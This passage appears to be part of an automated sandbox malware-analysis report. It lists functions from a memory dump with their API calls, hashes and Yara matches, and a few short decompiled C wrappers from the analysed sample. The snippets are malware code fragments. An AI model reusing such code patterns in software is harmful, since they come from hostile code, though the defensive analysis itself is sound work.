                                                                                • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407233, Relevance: 1.5, APIs: 1, Instructions: 41threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: 7997dd6130d69d6a6cdf66612845a13fcb068ba07fa9f9ab66acc80c3af8de7a
                                                                                • Instruction ID: c471a7a482c4acc8b97cc48f06a4835c8e75f01e11c13bfe5c3798fee8e62ae7
                                                                                • Opcode Fuzzy Hash: 7997dd6130d69d6a6cdf66612845a13fcb068ba07fa9f9ab66acc80c3af8de7a
                                                                                • Instruction Fuzzy Hash: A4F0E931E842243AE72056555C03FFAB7589B80B11F14457FFE44B92C2E6A96C0686E6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: f68e4ba5911c09c1a664b835add706f56c52f169149eeadc05de385caee06865
                                                                                • Instruction ID: 65204f1e0b89d90fab1e4f0e6e35f8594f9b64f63a7785db3f21326e2eb3355a
                                                                                • Opcode Fuzzy Hash: f68e4ba5911c09c1a664b835add706f56c52f169149eeadc05de385caee06865
                                                                                • Instruction Fuzzy Hash: E9F0CDB22002086FDB24DFA5DC80EEB77ACEF88310F14864EF94D97201C934E9008BB4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				L00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                0x0041864a
                                                                                0x00418660
                                                                                0x00418664

                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				L00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                0x004184df
                                                                                0x004184e7
                                                                                0x004184fd
                                                                                0x00418501

                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				L00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                0x004184a7
                                                                                0x004184bd
                                                                                0x004184c1

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				L00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                0x00418513
                                                                                0x0041852a
                                                                                0x00418538

                                                                                APIs
                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: c30558eb63c2e97d6c6831b1b92ae4fbf788bb3ad7f0b5fe7e59329d0a732ddf
                                                                                • Instruction ID: b5498e74984cec40a2c6a38f7ece94c688bc02762c3818d5905e012efedaac04
                                                                                • Opcode Fuzzy Hash: c30558eb63c2e97d6c6831b1b92ae4fbf788bb3ad7f0b5fe7e59329d0a732ddf
                                                                                • Instruction Fuzzy Hash: AFB092B29024D5CAEB51E7B04A08B2B7E04BBE6741F26C072E2020785B8778D491F6B6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00415675, Relevance: .0, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cda95eeb8fc153dcb9335fc20fe0a533b77ece451ebd1fac822223aa5b11d45d
                                                                                • Instruction ID: 784aaf75d6847e34398e7fdcc4e9fc29d16bea1a21f216775e5c3aa0b4e7d5c3
                                                                                • Opcode Fuzzy Hash: cda95eeb8fc153dcb9335fc20fe0a533b77ece451ebd1fac822223aa5b11d45d
                                                                                • Instruction Fuzzy Hash: A4D0A7329954344A8B204D38158A071BBE1F5A3015F0416E2CC889F809D103CC304289
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004162BB, Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5e72d1b2110083e7783e0588779ba092c49e61d681e7495d6aad8e7662da18a6
                                                                                • Instruction ID: 9b49e9f2612febdfa1d12948025200cfe642975c734e1ab1fe035e9a54a9dba0
                                                                                • Opcode Fuzzy Hash: 5e72d1b2110083e7783e0588779ba092c49e61d681e7495d6aad8e7662da18a6
                                                                                • Instruction Fuzzy Hash: 65C08C2BB4A14D4642204D4DB8020F1F7B9E687076B6432DEEE08A7501C812E01A0669
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406A95, Relevance: .0, Instructions: 14COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: deb9ceddc4b326a66533133460c918b732eeddb6e5fbbd1f2218a3e76ff13d29
                                                                                • Instruction ID: 50bc09a2f097cf002c8ac8189eea195ba4731081e88d5350736586a12d43565a
                                                                                • Opcode Fuzzy Hash: deb9ceddc4b326a66533133460c918b732eeddb6e5fbbd1f2218a3e76ff13d29
                                                                                • Instruction Fuzzy Hash: 49C08C33A2A1D949C111082D78422BCFB38D753124E1422CBEC88A7300C083C8068649
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00415843, Relevance: .0, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f554f8bfbe30919fdd7e2a225aef4f57e5c460e6ea1fd07443feec9e89f36446
                                                                                • Instruction ID: 7095dbb79f45dd1ec694e3b8dbe0fbbaec5a427556b30f4bf89a83f16fc47c12
                                                                                • Opcode Fuzzy Hash: f554f8bfbe30919fdd7e2a225aef4f57e5c460e6ea1fd07443feec9e89f36446
                                                                                • Instruction Fuzzy Hash: 2FA00237F86B180C6C541CBA7C584F8D735E6C307AC553B77D60CB34404052D017015D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA98A0, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 642c9eb89ff61dea4fc0fcc377602bdffb73801bd9e275d6b7473f7af850604a
                                                                                • Instruction ID: 80e7c74b88f51f5b80398f446ee9277c9114b3a0ad81874ba7596e57ede1daa3
                                                                                • Opcode Fuzzy Hash: 642c9eb89ff61dea4fc0fcc377602bdffb73801bd9e275d6b7473f7af850604a
                                                                                • Instruction Fuzzy Hash: 3690026130100403D24261694414646040DD7D2385F91C032E1414555ED6659953F172
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9820, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dbab123aedc6325027a01a29262ed1a7c9adae6a658414d64df24516cdff8b74
                                                                                • Instruction ID: f719995656ee623fe352466aea71d6d429b4a295b24b0a4bbf22f93bc17f59a5
                                                                                • Opcode Fuzzy Hash: dbab123aedc6325027a01a29262ed1a7c9adae6a658414d64df24516cdff8b74
                                                                                • Instruction Fuzzy Hash: B690027124100403D28171694404646040DE7D1381F91C032A0414554FD6959A56FAA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AAB040, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ef234063dc19f210a70bae7428b66babca74d45755b0a2ab5029f4164c4f962c
                                                                                • Instruction ID: ea4102b01792301a5e92dc3d108d4c7b813b652b012769d5aa7e9908f8e3d3c0
                                                                                • Opcode Fuzzy Hash: ef234063dc19f210a70bae7428b66babca74d45755b0a2ab5029f4164c4f962c
                                                                                • Instruction Fuzzy Hash: E69002A1601140434680B16948044465419E7E2341791C131A0444560DD6A89855E2A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA99D0, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a86d4458615c32696607ee7822342cbe61ce772ec181f27ea8fd5bfc0a6f2b36
                                                                                • Instruction ID: d642fb31bcf3141b8e6508ba1b20ec6347d49ddaa7ff503e7b7ee80854962304
                                                                                • Opcode Fuzzy Hash: a86d4458615c32696607ee7822342cbe61ce772ec181f27ea8fd5bfc0a6f2b36
                                                                                • Instruction Fuzzy Hash: 249002A121100043D244616944047460449D7E2341F51C032A2144554DD5699C61A165
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9950, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4f30ca6b83e0060b12c5ee421a4b3ea684fab9d9299c4989f7dbef5228d93b61
                                                                                • Instruction ID: e9433365228d043fac525cc9de086db07c8b76303feca9347528c0b528c59f52
                                                                                • Opcode Fuzzy Hash: 4f30ca6b83e0060b12c5ee421a4b3ea684fab9d9299c4989f7dbef5228d93b61
                                                                                • Instruction Fuzzy Hash: 939002A120140403D280656948046470409D7D1342F51C031A2054555FDA699C51B175
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9A80, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2b931fe39de15e83f2d5088335ae1216ff6f51a85aa9d4699440d2b402625700
                                                                                • Instruction ID: 936949fc0e195b3af87fcc8b50261bb1b15fd386ce1bef0e7766b1d19d1683af
                                                                                • Opcode Fuzzy Hash: 2b931fe39de15e83f2d5088335ae1216ff6f51a85aa9d4699440d2b402625700
                                                                                • Instruction Fuzzy Hash: A990026120144443D28062694804B4F4509D7E2342F91C039A4146554DD9559855A761
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9A10, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3cec0d34fa8c5ad8fd99880f9166ab7235441e3732bd9e4974a18dde3bf06b73
                                                                                • Instruction ID: 7fed28f27017d91fe909a0e699115d7c32b0c8d7970a2ed767ae396e20846922
                                                                                • Opcode Fuzzy Hash: 3cec0d34fa8c5ad8fd99880f9166ab7235441e3732bd9e4974a18dde3bf06b73
                                                                                • Instruction Fuzzy Hash: 5390027120140403D240616948087870409D7D1342F51C031A5154555FD6A5D891B571
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AAA3B0, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 944075773fbd0cb4e681be7bdb4c34e59ee2af17bbd1dad6dd3db8d8b5ddd3b6
                                                                                • Instruction ID: b5d0f9ce3fb4aada2f14b424a84e755e03a42f629bab66f3d7a7c4552aa4476f
                                                                                • Opcode Fuzzy Hash: 944075773fbd0cb4e681be7bdb4c34e59ee2af17bbd1dad6dd3db8d8b5ddd3b6
                                                                                • Instruction Fuzzy Hash: 6190027120144003D2807169844464B5409E7E1341F51C431E0415554DD6559856E261
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9B00, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a27cc5cc4dd8afb5a6faafa49f8ca1fe9297ee6eca6566a6397bc546049132c5
                                                                                • Instruction ID: 776c23441be3428e992387b3eba48c1286d5062ad414485a7b5721b9e89eb18f
                                                                                • Opcode Fuzzy Hash: a27cc5cc4dd8afb5a6faafa49f8ca1fe9297ee6eca6566a6397bc546049132c5
                                                                                • Instruction Fuzzy Hash: 2490026124100803D28071698414747040AD7D1741F51C031A0014554ED6569965B6F1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA95F0, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a1ba93e07d84be9c638fffe892155426d116ca7422aa2dd84ec44db0186891d4
                                                                                • Instruction ID: 9d74921b52bca0e5f4827e61ae14116197f4e33ba98693b6aaf6dfc56a16dac2
                                                                                • Opcode Fuzzy Hash: a1ba93e07d84be9c638fffe892155426d116ca7422aa2dd84ec44db0186891d4
                                                                                • Instruction Fuzzy Hash: 3390027120100803D244616948046C60409D7D1341F51C031A6014655FE6A59891B171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9520, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d3262ed5090320239eb0d62a0cef7ea9590f51a9383df634a5be37d2ac37b069
                                                                                • Instruction ID: 7d9662ad6e8a3fed1e88dd751ce4400a17061ec5250e468d676ad3c083087444
                                                                                • Opcode Fuzzy Hash: d3262ed5090320239eb0d62a0cef7ea9590f51a9383df634a5be37d2ac37b069
                                                                                • Instruction Fuzzy Hash: 889002E1201140934640A2698404B4A4909D7E1341F51C036E1044560DD5659851E175
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AAAD30, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 62fb9d8e3972fe3c2372059165309c6db8f1890b28b3c6dd8f8ad052b60e8a8c
                                                                                • Instruction ID: 34e9d23b28d07dda06aa8d4f62a22997667d2d4d74561f2e18c7cb25afe26bca
                                                                                • Opcode Fuzzy Hash: 62fb9d8e3972fe3c2372059165309c6db8f1890b28b3c6dd8f8ad052b60e8a8c
                                                                                • Instruction Fuzzy Hash: CE900271A0500013928071694814686440AE7E1781F55C031A0504554DD9949A55A3E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9560, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 807c7c3c4ea71f69cbc52fcb2c5ebad7b85942768e21f6a59e9ef5d9edbf1ac9
                                                                                • Instruction ID: 3e5ee99703103bf0c494ce5b740914bb704dc17833dd4cc4dfcae72819f0a1b8
                                                                                • Opcode Fuzzy Hash: 807c7c3c4ea71f69cbc52fcb2c5ebad7b85942768e21f6a59e9ef5d9edbf1ac9
                                                                                • Instruction Fuzzy Hash: BD900265221000030285A569060454B0849E7D7391791C035F1406590DD6619865A361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA96D0, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c717cff61ccb43fedfba088290d1647c2aa7196fd359bf905ec1a0e33c3671dc
                                                                                • Instruction ID: 53d2bf8f1b0d460efcd76ed25c909f7e08799cc461d3d10a605fa2e80575f851
                                                                                • Opcode Fuzzy Hash: c717cff61ccb43fedfba088290d1647c2aa7196fd359bf905ec1a0e33c3671dc
                                                                                • Instruction Fuzzy Hash: 4490027120100843D24061694404B860409D7E1341F51C036A0114654ED655D851B561
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9610, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c67040dbf8fec358a8ad22804a1dc878ed713e8c2d69e346b7b3533f76365146
                                                                                • Instruction ID: a9ede3f7c53e25d79cfd4b8e9e7ab47ef1a10a3254a9be50b3da8e2cb2080f6c
                                                                                • Opcode Fuzzy Hash: c67040dbf8fec358a8ad22804a1dc878ed713e8c2d69e346b7b3533f76365146
                                                                                • Instruction Fuzzy Hash: 5E90027160500803D290716944147860409D7D1341F51C031A0014654ED7959A55B6E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9650, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 58cd91f686df796bfb5bc47276fa1236813a9e44e8c53aa90c04331b943d09af
                                                                                • Instruction ID: c084f8f012757f0d8577e2c57e4afae6fd6f9ea66af732f8ed40cab02e9168f7
                                                                                • Opcode Fuzzy Hash: 58cd91f686df796bfb5bc47276fa1236813a9e44e8c53aa90c04331b943d09af
                                                                                • Instruction Fuzzy Hash: 4790027120504843D28071694404A860419D7D1345F51C031A0054694EE6659D55F6A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9730, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1aa518a431db8f3fbf8dab5a7c5c6332b0a3fe47b082b5ba08aea8963dc7d359
                                                                                • Instruction ID: 02f0165ac3a81477885a747cb44e45e695ecb3afb0d27b0a62c6ce26b9f2ab04
                                                                                • Opcode Fuzzy Hash: 1aa518a431db8f3fbf8dab5a7c5c6332b0a3fe47b082b5ba08aea8963dc7d359
                                                                                • Instruction Fuzzy Hash: EF90026160500403D280716954187460419D7D1341F51D031A0014554ED6999A55B6E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AAA710, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f11f42688422bbc866fa7ca59c1251a679a157c5348223cfc49f5d9060a121ec
                                                                                • Instruction ID: d28de0b2940ae967444aac691aa3b382a3b9abd4964a1e1fd030553d0fadbc3c
                                                                                • Opcode Fuzzy Hash: f11f42688422bbc866fa7ca59c1251a679a157c5348223cfc49f5d9060a121ec
                                                                                • Instruction Fuzzy Hash: 6C900271301000539640A6A95804A8A4509D7F1341F51D035A4004554DD5949861A161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9760, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 40f369818cbe01a39cc72b3055df0d2a12d602eba24952e00c01333135c411b9
                                                                                • Instruction ID: f0913206a4ae92bd550c2b46d54513cd428747659343a1f707c27b14d2a72613
                                                                                • Opcode Fuzzy Hash: 40f369818cbe01a39cc72b3055df0d2a12d602eba24952e00c01333135c411b9
                                                                                • Instruction Fuzzy Hash: 6690027120100403D240616955087470409D7D1341F51D431A0414558EE6969851B161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9770, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
